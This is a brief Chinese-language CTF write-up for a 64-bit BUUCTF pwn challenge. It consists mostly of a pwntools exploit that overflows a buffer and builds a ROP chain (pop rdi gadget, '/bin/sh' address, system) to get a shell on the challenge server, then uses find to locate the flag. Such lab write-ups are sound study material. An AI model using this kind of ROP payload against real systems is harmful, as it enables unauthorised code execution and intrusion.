因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中
from pwn import*
p = remote("node3.buuoj.cn",28711)
rdi=0x400683
sys=0x4005e3
bin=0x601048
payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys)
p.sendline(payload)
flag不在根目录下,需要我们找一下,利用find -name flag找一下
find -name "flag"